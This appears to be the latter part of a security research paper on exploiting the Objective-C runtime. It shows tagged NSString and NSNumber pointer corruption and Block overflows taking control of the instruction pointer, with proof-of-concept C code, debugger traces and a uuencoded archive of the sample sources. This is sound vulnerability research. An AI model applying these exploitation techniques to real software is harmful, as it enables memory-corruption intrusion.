followed by 4 bits for the length, 3 bits for the index into the tagged
pointer types array and finally the low bit to indicate tagged pointer
type.

<-------------------[ String Data ]-------------------->
11111111111111111111111111111111111111111111111111111111[1111][010][1]
                                                [strlen]<---->  |   |
                                                                |  tag
                                                         index: 02

The first scenario in which we can abuse the properties of a tagged
NSString is a partial overwrite into an untagged NSString. The example code
included with this paper (nsstring1.m) demonstrates this.

In this code (shown below) we create an NSString (s) using the C string
contents "thisisaverylongstringnottagged". Since this is longer than 7
bytes, the string is stored on the heap, and the object pointer points to
it.

We use the character pointer (ptr) to simulate a 1 byte write into the
least significant byte of the object pointer. This condition can occur from
either a controlled overflow, or an actual 1 byte off-by-one.

We write the value 0xf5 to this byte, and then print the length and
contents of the string.

int main(int argc, const char * argv[])
{
        NSString *s = [[NSString alloc]
initWithUTF8String:"thisisaverylongstringnottagged"];
        char *ptr = (char *)&s;
        *ptr = 0xf5; // NSString Tagged

        printf("[+] NSString @ 0x%lx\n",(unsigned long)s);
        printf("[+] String length: 0x%lx\n",(unsigned long)[s length]);
        NSLog(@"%@",s);

        return 0;
}

The value 0xf5 in the least significant byte has the following bit pattern:

        [1111][010][1]

As you can see, this leaves us with a string length of 0xf, an index of 0x2
and the LSB set to indicate a tagged pointer.

By only using a partial overwrite, we have left the upper 7 bytes of the
pointer untouched.

As you can see from the output below, the length of the string is 0xf (15)
after this overwrite. This means that when the NSLog() attempts to print
the string contents, 15 bytes of data are pulled out starting from the
inline data. This leaks the address of the object. If our target allows us
to retrieve a string value and use it, we can turn a one byte overwrite
into an info leak primitive.

        $ ./nsstring1
        [+] NSString @ 0x7fc0db4116f5
        [+] String length: 0xf
        2015-04-04 07:47:26.815 nsstring1[13335:92489992] eeeeeee 3eIjuaj


The next scenario which we will investigate involves overflowing into a
tagged NSString, rather than an un-tagged variant. The example code
nsstring2.m demonstrates this.

In this code, we initialize an NSString with the contents "AAAAAAA". Since
this is only 7 bytes of c-string it guarantees that the NSString will be a
tagged type. This means it will contain the value:

        0x4141414141414175

Essentially the first 7 bytes are taken up with our "A" contents. The last
byte contains the length (7) followed by the bitpattern to indicate
NSString type of tagged pointer.

Next, we once again simulate a single byte overflow into the object
pointer. This time we write the value 0x00, which is a common primitive in
real life due to off-by-one string operations. This forcefully unsets the
tagged LSB in the pointer, turning the tagged string into an un-tagged
type.

Finally we call the length method on the object.

int main(int argc, const char * argv[])
{
        NSString *s = [[NSString alloc] initWithUTF8String:"AAAAAAA"];
        char *ptr = (char *)&s;
        *ptr = 0x00; // un-tag

        printf("[+] NSString @ 0x%lx\n",(unsigned long)s);
        printf("[+] String length: 0x%lx\n",(unsigned long)[s length]);
        NSLog(@"%@",s);

        return 0;
}

As you can imagine, the runtime now treats our tagged object as untagged.
This means that the tagged pointer is now treated as a real pointer. If we
were able to control the contents of the NSString on initialization, this
would present us with direct control over the object cache lookup, allowing
us to use the construct presented earlier in the paper to turn this into
code execution.

(lldb) r
Process 13636 launched: './nsstring2' (x86_64)
[+] NSString @ 0x4141414141414100
Process 13636 stopped
* thread #1: tid = 0x5834fc3, 0x00007fff96c210d7
  libobjc.A.dylib`objc_msgSend + 23, queue = 'com.apple.main-thread', stop
reason = EXC_BAD_ACCESS (code=EXC_I386_GPFLT)
    frame #0: 0x00007fff96c210d7 libobjc.A.dylib`objc_msgSend + 23
libobjc.A.dylib`objc_msgSend + 23:
-> 0x7fff96c210d7:  andq   (%rdi), %r11
   0x7fff96c210da:  movq   %rsi, %r10
   0x7fff96c210dd:  andl   0x18(%r11), %r10d
   0x7fff96c210e1:  shlq   $0x4, %r10
(lldb) reg read rdi
     rdi = 0x4141414141414100

----[ Tagged NSNumber

As you can imagine, the NSNumber case is very similar to that of the
NSString. Any number value which can be contained in the first 7 bytes of
the pointer is stored inline as a tagged NSNumber, rather than performing
an allocation and storing the number on the heap.

The sample code nsnumber1.c demonstrates, once again, a single byte
overwrite which turns an object pointer into a tagged pointer containing an
inline NSNumber.

In this code, we begin by instantiating an NSNumber containing the value
0xdeadbeeffeedface. The contents of this number are unimportant, however
clearly the number is large enough that it would not fit into the upper
bytes of a tagged pointer, therefore this NSNumber is stored on the heap in
typical Objective-C fashion.

Next, we write the value 0xf7 to the lower byte of the object pointer. Once
again this converts the un-tagged object pointer into a tagged type, while
leaving the upper bits intact. Finally, we log the contents of the number
using the method unsignedLongLongValue.

int main(int argc, const char * argv[])
{
        NSNumber *n = [NSNumber numberWithInteger:0xdeadbeeffeedface];
        char *ptr = (char *)&n;
        *ptr = 0xf7;

        NSLog(@"0x%lx\n",(unsigned long)[n unsignedLongLongValue]);
        return 0;
}

As you can see from the output below, rather than printing the initialized
contents (0xdeadbeeffeedface) the NSLog call displays the object pointer
value itself, once again creating an information leak of this value.

$ ./nsnumber1
2015-04-04 09:26:58.701 nsnumber1[14663:92514549] 0x7fd6134116

The final tagged pointer example nsnumber2.m demonstrates the counter case
to this. In this code an NSNumber is instantiated containing the value
0x0041414141414141. As you can see from the leading NULL byte, this value
is small enough that it fits within the first 7 bytes of the object
pointer. Therefore, this object is created as a tagged pointer with the
value:

        0x4141414141414107

We once again truncate the final byte using a character pointer, removing
the tagged bit before calling a method on it (unsignedLongLongValue).

int main(int argc, const char * argv[])
{
        NSNumber *n = [NSNumber numberWithInteger:0x0041414141414141];
        char *ptr = (char *)&n;
        *ptr = 0x00;

        NSLog(@"0x%lx\n",(unsigned long)[n unsignedLongLongValue]);
        return 0;
}

When the method call is made, the runtime treats the number's contents as a
pointer, and leaves us with a dangling Objective-C message send call, which
we can once again abuse to control execution.

Process 14636 launched: './nsnumber2' (x86_64)
Process 14636 stopped
* thread #1: tid = 0x583a67f, 0x00007fff96c210d7
  libobjc.A.dylib`objc_msgSend + 23, queue = 'com.apple.main-thread', stop
reason = EXC_BAD_ACCESS (code=EXC_I386_GPFLT)
    frame #0: 0x00007fff96c210d7 libobjc.A.dylib`objc_msgSend + 23
libobjc.A.dylib`objc_msgSend + 23:
-> 0x7fff96c210d7:  andq   (%rdi), %r11
   0x7fff96c210da:  movq   %rsi, %r10
   0x7fff96c210dd:  andl   0x18(%r11), %r10d
   0x7fff96c210e1:  shlq   $0x4, %r10
(lldb) reg read rdi
     rdi = 0x4141414141414100

----[ Additional Tagged Types

The additional types in the table each have unique properties. I will leave
it as an exercise to the reader to investigate each of these types for
useful ways they can be used from an exploitation perspective.

--[ Blocks

So, Apple being Apple, decided the tried and tested C standard wasn't good
enough for their magical super fantastic operating system and went ahead
and modified it. They did this by adding a new construct called Blocks.

For anyone familiar with the concept of an anonymous function reference in
Perl, or a lambda function in Python, this is essentially what a Block is.
You can read about blocks in detail in Apple's guide [4]. TL;DR though, a
block basically uses the "^" operator to declare a special type of function
pointer where the body of the function can be defined inline. This is
mostly a syntactic feature, but has a few runtime uses as well. They can be
passed to other functions just like a function pointer, and can access
global data, or data relative to the current executing state they are
defined in. Syntactically blocks are very similar to ECMAScript closures,
however internally they function a little differently as you'll see.

--[ Sample Block Code

Ok let's take a look at how Blocks are defined. Apple's guide [4] provides
the following little example code:


        int main(int ac, char **av)
        {
                int multiplier = 7;

                int (^myBlock)(int) = ^(int num) {

                    return num * multiplier;

                };

                printf("%d\n", myBlock(3));
        }

As you can see, this code defines a block called myBlock which takes an
integer argument "num" and multiplies it with a value "multiplier" taken
from the stack of the main function where the block was declared.

The myBlock Block is then called passing the value 3. As expected when
executed the block is entered and returns the multiplication of 7 * 3.

-[dcbz@squee:~/code/blocks]$ gcc block.c -o block
-[dcbz@squee:~/code/blocks]$ ./block
21

Note, nothing fancy is needed to compile this, Apple's built in compiler
supports Blocks out of the box.

At first glance, I expected this feature to be syntactical only. I thought
the compiler would create a function, and then just add a single call
instruction in the appropriate places. Or maybe a function pointer if
reassignment was required. However if we walk through the assembly listing
for this trivial program we can see that is not even close to the case.

First we have the basic function prologue as expected...

EntryPoint:
       push       rbp                           ; XREF=0x100000e2f
       mov        rbp, rsp
       sub        rsp, 0x50

Next argv/argc are moved into stack variables.

       mov        rax, rsi
       mov        ecx, edi
       mov        dword [ss:rbp-0x50+var_76], ecx
       mov        qword [ss:rbp-0x50+var_64], rax

The value 0x7 is stored in a stack variable to be referenced by the Block.
This is the "multiplier" variable.

       mov        dword [ss:rbp-0x50+var_12], 0x7

Ok now we come to the meat of the Block implementation. As you will see,
there's a little bit of code here, much more than expected. Before we
continue tracing it we need to understand a little bit more about Block
internals.

The free chapter from the book Advanced Mac OS X Programming: The Big Nerd
Ranch Guide [5] has a really nice write up on the internals of Blocks which
makes this next bit really clear.

Basically there are two structures defined for every Block created, the
block_descriptor and block_literal, as well as the function containing the
actual compiled implementation of the Block.

The block literal structure is the most important structure for us to
understand. The majority of the assembly listing we are tracing is used to
populate this structure appropriately. The definition for the structure is
shown below:

        struct block_literal_NAME {
            void *isa;
            int flags;
            int reserved;
            void (*invoke)(void *literal, ...);
            struct block_descriptor_NAME *descriptor;
            /* referenced captured variables follow */
        };

Basically, the use of this structure is to turn our Block into a pseudo
Objective-C object. As you can see the typical 'isa' pointer at offset 0
contains a pointer to the base class struct for the object.

In the listing below, we can see that the block_literal struct is being
created at offset rbp-0x50+var_16. The ISA pointer is populated with a
pointer to the class "NSConcreteStackBlock".

       lea        rax, qword [ss:rbp-0x50+var_16]
       mov        rcx, qword [ds:imp___got___NSConcreteStackBlock]
       lea        rcx, qword [ds:rcx]
       mov        qword [ss:rbp-0x50+var_16], rcx

As described in [5], this class indicates that the Block is to be stored on
the stack. Other possible alternative base classes are:
NSConcreteGlobalBlock for global Blocks, NSConcreteMallocBlock for heap
based Blocks, NSConcreteAutoBlock for Blocks affected by garbage collection
and NSConcreteFinalizingBlock for blocks which have a
"finalizer"/destructor which must be run upon garbage collection. Cross
referencing these class structs can give us a pretty good indication where
Blocks are used in a binary, and also their location in memory at runtime.

       mov        dword [ss:rbp-0x50+var_24], 0x40000000

The next element populated is the flags. I won't go into this too much
because the write-up at [5] covers it perfectly. The flags enum stores some
meta information about the Block including garbage collection settings and
whether or not the Block is global.

Next the reserved field is set to 0.

       mov        dword [ss:rbp-0x50+var_28], 0x0

The main_block_invoke_1 function is the invoke() method for this Block. It
basically contains the compiled instructions for the block itself. As you
will see it is called later when the Block is executed.

       lea        rcx, qword [ds:___main_block_invoke_1]
       mov        qword [ss:rbp-0x50+var_32], rcx

Earlier we discussed the fact that there are two structures for every
Block. The second of these, the block descriptor is pre-created at compile
time and stored in the __data section.

       lea        rcx, qword [ds:___block_descriptor_tmp_1.1]
       mov        qword [ss:rbp-0x50+var_40], rcx

The struct definition is as follows:

        static const struct block_descriptor_NAME {
            unsigned long reserved;
            unsigned long literal_size;

            /* helper functions - present only if needed */
            void (*copy_helper)(void *dst, void *src);
            void (*dispose_helper)(void *src);
        };

Basically the only field we care about most of the time is the
literal_size, which contains the total size of the block_literal. The other
function pointers are only used in specific cases.

The rest of the block literal struct contains the variables captured by
the Block. Here, a copy of the "multiplier" variable is stored in the
struct.

       mov        ecx, dword [ss:rbp-0x50+var_12]
       mov        dword [ss:rbp-0x50+var_48], ecx

Now that the literal struct is populated, the code has to invoke the Block
passing in the arguments. This is done by retrieving the invoke function
pointer from the literal struct populated earlier.

I probably should have used an optimization flag when I compiled this,
because the next couple of instructions are a little silly. A pointer to
the block literal struct is moved into var_0, then moved back into rax...

       mov        qword [ss:rbp-0x50+var_0], rax
       mov        rax, qword [ss:rbp-0x50+var_0]

Next the invoke function pointer is moved into rax by dereferencing this
pointer and adding 16 (0x10).

       mov        rax, qword [ds:rax+0x10]

The pointer to the block literal struct is then moved into rcx.

       mov        rcx, qword [ss:rbp-0x50+var_0]

The value being passed to the Block in the printf() call (3) is temporarily
moved to edx.

       mov        edx, 0x3                      ; arg to block

The block_literal struct pointer is moved to rdi, which is the first
argument in the x86_64 function calling convention (rdi,rsi,rdx,rcx).

       mov        rdi, rcx

The function argument (3) is then moved to esi as the second argument.

       mov        esi, edx

Finally the invoke() method is called. invoke(self,3) basically.

       call       rax

The rest of the assembly listing is just a call to printf to display the
result, followed by the epilogue.

       mov        ecx, eax
       xor        dl, dl
       lea        rdi, qword [ds:0x100000f2c]   ; "%d\\n"
       mov        esi, ecx
       mov        al, dl
       call       imp___stubs__printf
       mov        eax, dword [ss:rbp-0x50+var_60]
       add        rsp, 0x50
       pop        rbp
       ret

As you can see, this process is fairly straightforward, so now that we
understand it we can look at how to abuse it.

--[ Exploitation

In order to demonstrate exploitation scenarios where these Blocks can be
utilized I will start by modifying the example code to contain a trivial
stack overflow.

int main(int ac, char **av)
{
        int multiplier = 7;
        int (^myBlock)(int) = ^(int num) {

            return num * multiplier;

        };
        char buf[20];
        if(ac != 2) {
                printf("error: need 2nd arg\n");
                exit(1);
        }

        strcpy(buf,av[1]);
        printf("%s: %d\n", buf, myBlock(3));
        exit(1);
}

As you can see, prior to the final printf() I added a strcpy() call which
copies the first argument to the program into a small stack buffer without
bounds checking. I also added an exit(1); call to demonstrate that this
program couldn't necessarily be exploited without utilizing the Block. This
also applies to cases where stack cookies (-fstack-protector) are used.

As we saw in the previous example, the block_literal structure used will be
stored on the stack. Also the myBlock pointer to this structure is stored
on the stack in this case.

So what happens when we overflow the buf array in this case? Let's run it
and see.

-[dcbz@squee:~/code/blocks]$ gcc blockof.c -o of
-[dcbz@squee:~/code/blocks]$ ./of
error: need 2nd arg
-[dcbz@squee:~/code/blocks]$ ./of hello
hello: 21
-[dcbz@squee:~/code/blocks]$ gdb ./of
(gdb) r `perl -e'print "A"x5000'`
Starting program: /Users/dcbz/code/blocks/of `perl -e'print "A"x5000'`

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: 13 at address: 0x0000000000000000
0x0000000100000e4e in main ()

As you can see, running this program with an overly large argument
overflows the stack based buffer and we get an EXC_BAD_ACCESS exception.
For some reason gdb claims that it happened at address 0x0. However if we
do some investigation:

(gdb) x/i $pc
0x100000e4e <main+158>: mov    rax,QWORD PTR [rax+0x10]
(gdb) i r rax
rax            0x4141414141414141        4702111234474983745

We can see that the program is crashing dereferencing the block_literal
struct pointer to retrieve the "invoke" pointer. (based on our previous
understanding of the assembly listing.) This means we have overwritten the
pointer to the block_literal struct with a series of 'A's (0x41). Because
the pointer to the struct lies in front of the struct itself we are unable
to modify the invoke pointer directly. Therefore we are left with a very
similar construct to a C++ vptr dereference. We can exploit this in a very
similar fashion.

The construct is essentially "call [ptr+0x10]", therefore we need to
control memory at a known address in order to place a pointer to our
shellcode, then we can use the address of this pointer minus 16 when we
overwrite the block_literal struct pointer. This will result in execution
flow being redirected to our shellcode. Another solution would be to
replace the value of the invoke pointer with another block's invoke method
or known function. Then utilize an argument mismatch in a favorable way.
Both of these things have been documented numerous times so I'm not going
to go into any more detail on this here. I will say, though, that a few
techniques for controlling memory at a fixed location are the
shared_region_map_file technique, disabling ASLR/NX with posix_spawn for
local issues, or ROP/heap spray for remote issues.

Now that we've looked at the stack overflow case, let's look at what
happens when the block_literal struct contents are on the heap.

To test this basically we can take the test stack overflow we looked at
earlier, and this time move the destination of the strcpy() call to the
heap.

In order to move the Block to the heap we have to utilize a function in the
runtime architecture. Basically libSystem is linked to the block library:
/usr/lib/system/libsystem_blocks.dylib. This library contains functions for
manipulating and displaying Block information. One of the exported
functions, "Block_copy" is used to create a copy of the block on the heap
and return a pointer to it. This is typically used by functions that need
to return a Block, since returning a pointer to a Block on the function's
stack would fail when the stack unwinds. The heap Block is then
free()'ed via the Block_release function. To call these functions we need
to include the header file "Block.h".

The Block_copy function checks what type of block is being passed to it. If
the Block was allocated on the heap or .bss it simply returns the Block
rather than making a copy. Otherwise a copy is placed on the heap and a
pointer returned, as you can see in the example code below:


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <Block.h>

int main(int ac, char **av)
{
        char *buf = malloc(20);
        int multiplier = 7;
        int (^stackBlock)(int) = ^(int num) {

            return num * multiplier;

        };
        int (^myBlock)(int) = Block_copy(stackBlock);
        if(ac != 2) {
                printf("error: need 2nd arg\n");
                exit(1);
        }

        strcpy(buf,av[1]);
        printf("%s: %d\n", buf, myBlock(3));
        exit(1);
}

Now that we have some sample code, let's compile and run it and see where
overflowing it gets us.

-[dcbz@squee:~/code/blocks]$ gcc bh.c -o bh
-[dcbz@squee:~/code/blocks]$ gdb ./bh
(gdb) r hi
Starting program: /Users/dcbz/code/blocks/bh hi
Reading symbols for shared libraries +............................. done
hi: 21

As expected, running it with the string "hi" prints the usual output, this
time executing via the heap allocated Block. However if we pass a string of
500 'A's...

Program exited with code 01.
(gdb) r `perl -e'print "A"x500'`
Starting program: /Users/dcbz/code/blocks/bh `perl -e'print "A"x500'`

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: 13 at address: 0x0000000000000000
0x0000000100000dc4 in main ()
(gdb) x/i $pc
0x100000dc4 <main+276>: call   rax
(gdb) i r rax
rax            0x4141414141414141       4702111234474983745

As you can see we get a crash again, however this time rather than it
dereferencing the block_literal pointer, we have overwritten the invoke()
method pointer itself and have directly controlled rip.

As you can imagine both these cases are useful when trying to gain control
of an overflow, especially in the case of stack or heap canaries, or an
unreachable return.

--[ Future Research -- Non Pointer ISA

Unfortunately, due to the fact that I'm trying to coordinate this paper
release with my Infiltrate 2015 talk I am probably not going to have time
to fully research this area prior to publication.

Basically in the Objective-C runtime on arm64 the ISA pointer can
function as a tagged pointer as well. Due to the nature of the address
space there are a significant number of unused bits in the pointer which
contain an interesting amount of meta-data. The write-up at [6] clearly
explains all this. I will leave the bit pattern below just in case you are
interested. I am particularly eager to investigate the has_cxx_dtor
attribute, as well as the sidetable reference counting information.

(LSB)
1       bit     indexed

        0 is raw isa, 1 is non-pointer isa.

1       bit     has_assoc

        Object has or once had an associated reference. Object with no
        associated references can deallocate faster.

1       bit     has_cxx_dtor

        Object has a C++ or ARC destructor. Objects with no destructor can
        deallocate faster.

30      bits    shiftcls

        Class pointer's non-zero bits.

9       bits    magic

        Equals 0xd2. Used by the debugger to distinguish real objects from
        uninitialized junk.

1       bit     weakly_referenced

        Object is or once was pointed to by an ARC weak variable. Objects
        not weakly referenced can deallocate faster.

1       bit     deallocating

        Object is currently deallocating.

1       bit     has_sidetable_rc

        Object's retain count is too large to store inline.

19      bits    extra_rc

        Object's retain count above 1. (For example, if extra_rc is 5 then
        the object's real retain count is 6.)
(MSB)

--[ Conclusion

Well you made it to the end reader. Hopefully this was useful in some way!
Writing is very painful...

Thanks for reading!

- nemo

--[ References

[1] The Objective-C Runtime: Understanding and Abusing -
        http://phrack.org/issues/66/4.html
[2] Abusing Performance Optimization Weaknesses to Bypass ASLR -
        http://www.cc.gatech.edu/~blee303/paper/BH_ASLR_slides.pdf
[3] Let's Build Tagged Pointers -
        https://www.mikeash.com/pyblog/ \
        friday-qa-2012-07-27-lets-build-tagged-pointers.html
[4] Apple Block Conceptual -
        http://developer.apple.com/library/ios/#documentation/cocoa/ \
        Conceptual/Blocks/Articles/bxOverview.html#//apple_ref/doc/uid/ \
        TP40007502-CH3-SW1
[5] Big Nerd Ranch Advanced Mac OS X Programming: Block -
        http://www.informit.com/articles/article.aspx?p=1749598&seqNum=12
[6] Non-pointer ISA
        http://www.sealiesoftware.com/blog/archive/2013/09/24/ \
        objc_explain_Non-pointer_isa.html

--[ Appendix - Source Code

begin 644 code.tgz
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
/P<'!\<OB?]V9SVT`4```
`
end